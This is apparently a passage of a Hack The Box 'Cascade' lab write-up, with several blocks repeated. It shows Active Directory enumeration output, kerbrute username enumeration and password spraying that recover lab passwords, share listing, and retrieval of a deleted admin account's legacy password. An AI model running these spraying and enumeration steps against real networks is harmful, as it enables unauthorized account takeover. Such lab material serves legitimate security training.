'557': groupname: Incoming Forest Trust Builders type: builtin
'558': groupname: Performance Monitor Users type: builtin
'559': groupname: Performance Log Users type: builtin
'560': groupname: Windows Authorization Access Group type: builtin
'561': groupname: Terminal Server License Servers type: builtin
'562': groupname: Distributed COM Users type: builtin
'568': groupname: IIS_IUSRS type: builtin
'569': groupname: Cryptographic Operators type: builtin
'571': groupname: Allowed RODC Password Replication Group type: local
'572': groupname: Denied RODC Password Replication Group type: local
'573': groupname: Event Log Readers type: builtin
'574': groupname: Certificate Service DCOM Access type: builtin =======================================
| Shares via RPC on 10.129.29.246 | =======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user ==========================================
| Policies via RPC for 10.129.29.246 | ==========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information: Password history length: None Minimum password length: 5 Maximum password age: not set Password properties: - DOMAIN_PASSWORD_COMPLEX: false - DOMAIN_PASSWORD_NO_ANON_CHANGE: false - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information: Lockout observation window: 30 minutes Lockout duration: 30 minutes Lockout threshold: None
Domain logoff information: Force logoff time: not set ==========================================
| Printers via RPC for 10.129.29.246 | ==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED Completed after 6.83 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ rpcclient -U "" -N 10.129.29.246
rpcclient $> rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
I further enumerate domain with enum4linux and I got back some users and some domains info:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ enum4linux 10.129.29.246
ENUM4LINUX - next generation (v1.3.4) ==========================
| Target Information | ==========================
[*] Target ........... 10.129.29.246
[*] Username ......... ''
[*] Random Username .. 'pnpssmjg'
[*] Password ......... ''
[*] Timeout .......... 5 second(s) ======================================
| Listener Scan on 10.129.29.246 | ======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp =====================================================
| Domain Information via LDAP for 10.129.29.246 | =====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: cascade.local ============================================================
| NetBIOS Names and Workgroup/Domain for 10.129.29.246 | ============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out ==========================================
| SMB Dialect Check on 10.129.29.246 | ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects: SMB 1.0: false SMB 2.02: true SMB 2.1: true SMB 3.0: false SMB 3.1.1: false
Preferred dialect: SMB 2.1
SMB1 only: false
SMB signing required: true ============================================================
| Domain Information via SMB session for 10.129.29.246 | ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: CASC-DC1
NetBIOS domain name: CASCADE
DNS domain: cascade.local
FQDN: CASC-DC1.cascade.local
Derived membership: domain member
Derived domain: CASCADE ==========================================
| RPC Session Check on 10.129.29.246 | ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE ====================================================
| Domain Information via RPC for 10.129.29.246 | ====================================================
[+] Domain: CASCADE
[+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453
[+] Membership: domain member ================================================
| OS Information via RPC for 10.129.29.246 | ================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 7, Windows Server 2008 R2
OS version: '6.1'
OS release: ''
OS build: '7601'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null ======================================
| Users via RPC on 10.129.29.246 | ======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 15 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 15 user(s) via 'enumdomusers'
[+] After merging user results we have 15 user(s) total:
'1106': username: arksvc name: ArkSvc acb: '0x00000210' description: (null)
'1107': username: s.smith name: Steve Smith acb: '0x00000210' description: (null)
'1109': username: r.thompson name: Ryan Thompson acb: '0x00000210' description: (null)
'1111': username: util name: Util acb: '0x00000210' description: (null)
'1116': username: j.wakefield name: James Wakefield acb: '0x00000210' description: (null)
'1121': username: s.hickson name: Stephanie Hickson acb: '0x00000210' description: (null)
'1122': username: j.goodhand name: John Goodhand acb: '0x00000210' description: (null)
'1124': username: a.turnbull name: Adrian Turnbull acb: '0x00000214' description: (null)
'1127': username: e.crowe name: Edward Crowe acb: '0x00000211' description: (null)
'1128': username: b.hanson name: Ben Hanson acb: '0x00000211' description: (null)
'1129': username: d.burman name: David Burman acb: '0x00000210' description: (null)
'1130': username: BackupSvc name: BackupSvc acb: '0x00000210' description: (null)
'1134': username: j.allen name: Joseph Allen acb: '0x00000210' description: (null)
'1135': username: i.croft name: Ian Croft acb: '0x00000211' description: (null)
'501': username: CascGuest name: (null) acb: '0x00000215' description: Built-in account for guest access to the computer/domain =======================================
| Groups via RPC on 10.129.29.246 | =======================================
[*] Enumerating local groups
[+] Found 17 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 15 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 6 group(s) via 'enumdomgroups'
[+] After merging groups results we have 38 group(s) total:
'1102': groupname: DnsAdmins type: local
'1103': groupname: DnsUpdateProxy type: domain
'1113': groupname: IT type: local
'1114': groupname: Production type: local
'1115': groupname: HR type: local
'1119': groupname: AD Recycle Bin type: local
'1120': groupname: Backup type: local
'1123': groupname: Temps type: local
'1125': groupname: WinRMRemoteWMIUsers__ type: local
'1126': groupname: Remote Management Users type: local
'1132': groupname: Factory type: local
'1133': groupname: Finance type: local
'1137': groupname: Audit Share type: local
'1138': groupname: Data Share type: local
'498': groupname: Enterprise Read-only Domain Controllers type: domain
'513': groupname: Domain Users type: domain
'514': groupname: Domain Guests type: domain
'515': groupname: Domain Computers type: domain
'517': groupname: Cert Publishers type: local
'520': groupname: Group Policy Creator Owners type: domain
'545': groupname: Users type: builtin
'546': groupname: Guests type: builtin
'553': groupname: RAS and IAS Servers type: local
'554': groupname: Pre-Windows 2000 Compatible Access type: builtin
'555': groupname: Remote Desktop Users type: builtin
'556': groupname: Network Configuration Operators type: builtin
'557': groupname: Incoming Forest Trust Builders type: builtin
'558': groupname: Performance Monitor Users type: builtin
'559': groupname: Performance Log Users type: builtin
'560': groupname: Windows Authorization Access Group type: builtin
'561': groupname: Terminal Server License Servers type: builtin
'562': groupname: Distributed COM Users type: builtin
'568': groupname: IIS_IUSRS type: builtin
'569': groupname: Cryptographic Operators type: builtin
'571': groupname: Allowed RODC Password Replication Group type: local
'572': groupname: Denied RODC Password Replication Group type: local
'573': groupname: Event Log Readers type: builtin
'574': groupname: Certificate Service DCOM Access type: builtin =======================================
| Shares via RPC on 10.129.29.246 | =======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user ==========================================
| Policies via RPC for 10.129.29.246 | ==========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information: Password history length: None Minimum password length: 5 Maximum password age: not set Password properties: - DOMAIN_PASSWORD_COMPLEX: false - DOMAIN_PASSWORD_NO_ANON_CHANGE: false - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information: Lockout observation window: 30 minutes Lockout duration: 30 minutes Lockout threshold: None
Domain logoff information: Force logoff time: not set ==========================================
| Printers via RPC for 10.129.29.246 | ==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED Completed after 6.83 seconds
grep "username:" users.txt | awk '{gsub(/^\$/, "", $2); print $2}' > usernames.txt
grep "username:" users.txt | awk '{gsub(/^\$/, "", $2); print $2}' > usernames.txt
grep "username:" users.txt | awk '{gsub(/^\$/, "", $2); print $2}' > usernames.txt
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute userenum -d cascade.local domain_users.txt --dc 10.129.29.246 __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 19:34:50 > Using KDC(s):
2026/05/06 19:34:50 > 10.129.29.246:88 2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > Done! Tested 15 usernames (11 valid) in 10.036 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute userenum -d cascade.local domain_users.txt --dc 10.129.29.246 __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 19:34:50 > Using KDC(s):
2026/05/06 19:34:50 > 10.129.29.246:88 2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > Done! Tested 15 usernames (11 valid) in 10.036 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute userenum -d cascade.local domain_users.txt --dc 10.129.29.246 __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 19:34:50 > Using KDC(s):
2026/05/06 19:34:50 > 10.129.29.246:88 2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > Done! Tested 15 usernames (11 valid) in 10.036 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "rY4n5eva" __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 20:22:23 > Using KDC(s):
2026/05/06 20:22:23 > 10.129.29.246:88 2026/05/06 20:22:36 > [+] VALID LOGIN: [email protected]:rY4n5eva
2026/05/06 20:22:43 > Done! Tested 11 logins (1 successes) in 20.084 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "rY4n5eva" __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 20:22:23 > Using KDC(s):
2026/05/06 20:22:23 > 10.129.29.246:88 2026/05/06 20:22:36 > [+] VALID LOGIN: [email protected]:rY4n5eva
2026/05/06 20:22:43 > Done! Tested 11 logins (1 successes) in 20.084 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "rY4n5eva" __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 20:22:23 > Using KDC(s):
2026/05/06 20:22:23 > 10.129.29.246:88 2026/05/06 20:22:36 > [+] VALID LOGIN: [email protected]:rY4n5eva
2026/05/06 20:22:43 > Done! Tested 11 logins (1 successes) in 20.084 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ crackmapexec smb 10.129.29.246 -u 'r.thompson' -p 'rY4n5eva' --shares
SMB 10.129.29.246 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.29.246 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva SMB 10.129.29.246 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.29.246 445 CASC-DC1 Share Permissions Remark
SMB 10.129.29.246 445 CASC-DC1 ----- ----------- ------
SMB 10.129.29.246 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.29.246 445 CASC-DC1 Audit$ SMB 10.129.29.246 445 CASC-DC1 C$ Default share
SMB 10.129.29.246 445 CASC-DC1 Data READ SMB 10.129.29.246 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.29.246 445 CASC-DC1 NETLOGON READ Logon server share SMB 10.129.29.246 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.29.246 445 CASC-DC1 SYSVOL READ Logon server share
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ crackmapexec smb 10.129.29.246 -u 'r.thompson' -p 'rY4n5eva' --shares
SMB 10.129.29.246 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.29.246 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva SMB 10.129.29.246 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.29.246 445 CASC-DC1 Share Permissions Remark
SMB 10.129.29.246 445 CASC-DC1 ----- ----------- ------
SMB 10.129.29.246 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.29.246 445 CASC-DC1 Audit$ SMB 10.129.29.246 445 CASC-DC1 C$ Default share
SMB 10.129.29.246 445 CASC-DC1 Data READ SMB 10.129.29.246 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.29.246 445 CASC-DC1 NETLOGON READ Logon server share SMB 10.129.29.246 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.29.246 445 CASC-DC1 SYSVOL READ Logon server share
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ crackmapexec smb 10.129.29.246 -u 'r.thompson' -p 'rY4n5eva' --shares
SMB 10.129.29.246 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.29.246 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva SMB 10.129.29.246 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.29.246 445 CASC-DC1 Share Permissions Remark
SMB 10.129.29.246 445 CASC-DC1 ----- ----------- ------
SMB 10.129.29.246 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.29.246 445 CASC-DC1 Audit$ SMB 10.129.29.246 445 CASC-DC1 C$ Default share
SMB 10.129.29.246 445 CASC-DC1 Data READ SMB 10.129.29.246 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.29.246 445 CASC-DC1 NETLOGON READ Logon server share SMB 10.129.29.246 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.29.246 445 CASC-DC1 SYSVOL READ Logon server share
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "sT333ve2" __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 21:18:27 > Using KDC(s):
2026/05/06 21:18:27 > 10.129.29.246:88 2026/05/06 21:18:37 > [+] VALID LOGIN: [email protected]:sT333ve2
2026/05/06 21:18:47 > Done! Tested 11 logins (1 successes) in 20.096 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "sT333ve2" __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 21:18:27 > Using KDC(s):
2026/05/06 21:18:27 > 10.129.29.246:88 2026/05/06 21:18:37 > [+] VALID LOGIN: [email protected]:sT333ve2
2026/05/06 21:18:47 > Done! Tested 11 logins (1 successes) in 20.096 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "sT333ve2" __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop 2026/05/06 21:18:27 > Using KDC(s):
2026/05/06 21:18:27 > 10.129.29.246:88 2026/05/06 21:18:37 > [+] VALID LOGIN: [email protected]:sT333ve2
2026/05/06 21:18:47 > Done! Tested 11 logins (1 successes) in 20.096 seconds
PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'isDeleted -eq $true -and name -like "*TempAdmin*"' -IncludeDeletedObjects -Properties * accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : [email protected]
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'isDeleted -eq $true -and name -like "*TempAdmin*"' -IncludeDeletedObjects -Properties * accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : [email protected]
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'isDeleted -eq $true -and name -like "*TempAdmin*"' -IncludeDeletedObjects -Properties * accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : [email protected]
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM - This AD machine
- Domain: cascade.local
🏷️ Tags
More from Tools
Tools: Complete Guide to CalyxOS Android 16 Part 2: The Long-Term Test
Tools: Latest: SHIFT: How a Shell Becomes Convergent
Tools: Cron Jobs Explained: Scheduling Automated Tasks on Linux
